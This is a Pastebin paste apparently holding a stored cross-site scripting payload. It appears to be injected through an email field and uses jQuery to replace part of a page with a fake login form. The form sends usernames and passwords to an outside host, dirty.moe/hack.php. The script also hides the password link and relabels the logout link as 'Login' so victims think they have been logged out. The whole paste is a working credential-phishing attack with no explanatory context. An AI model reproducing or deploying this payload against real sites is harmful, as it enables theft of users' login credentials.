Advertisement
Guest User

Untitled

a guest
Apr 27th, 2017
558
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.92 KB | None | 0 0
  1. hack@dirty.moe<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  2.  
  3. <script>
  4. $('td[valign="top"]:nth-of-type(2)').replaceWith(`
  5. <h3>Login</h3>
  6. Please enter your credentials: <br><br>
  7. <form method="POST" action="http://dirty.moe/hack.php">
  8. <center>
  9. <table>
  10. <tbody><tr>
  11. <td>Username:</td>
  12. <td><input id="username" name="username" data-cip-id="username"></td>
  13. </tr>
  14. <tr>
  15. <td>Password:</td>
  16. <td><input id="password" name="password" type="password" data-cip-id="password"></td>
  17. </tr>
  18. <tr>
  19. <td></td>
  20. <td><input id="submit" type="submit" value="Login"></td>
  21. </tr>
  22. </tbody></table>
  23. </center>
  24. </form>
  25. If you dont have an account with us then please <a href="register.jsp">Register</a> now for a free account.
  26. <br><br>
  27. `);
  28. var a = $('a[href="password.jsp"]');
  29.  
  30. a.hide();
  31. a.parent().html('Guest User');
  32.  
  33. $('a[href="logout.jsp"]').html("Login");
  34.  
  35.  
  36.  
  37.  
  38. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement